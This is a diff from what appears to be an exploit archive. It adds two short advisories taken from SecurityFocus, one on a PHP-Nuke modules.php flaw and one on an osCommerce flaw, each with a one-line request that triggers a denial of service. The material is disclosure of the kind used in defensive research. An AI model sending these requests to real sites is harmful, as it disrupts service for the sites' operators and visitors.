platforms/php/dos/22110.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/6465/info
A denial of service vulnerability has been reported for the modules.php script used by PHP-Nuke. The vulnerability occurs because the modules.php script does not properly validate some URI parameters.
An attacker can exploit this vulnerability by modifying certain parameters when making a request for the modules.php script. This will prevent visitors to the site hosting PHP-Nuke from creating a new account thereby leading to a denial of service vulnerability.
http://target.com/modules.php?name=Your_Account&op=userinfo&uname=

7
platforms/php/dos/22494.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/7351/info
It has been reported that an attacker may trigger a denial of service condition in osCommerce application. If malicious URI parameters are passed to several of the osCommerce PHP pages, the mySQL and web server hosting osCommerce reportedly becomes unstable, possibly resulting in a denial of service condition.
It should be noted that although osCommerce version 2.2cvs was reported vulnerable, previous versions may also be affected.
product_info.php?products_id=[large amount of random content]

Some files were not shown because too many files have changed in this diff Show more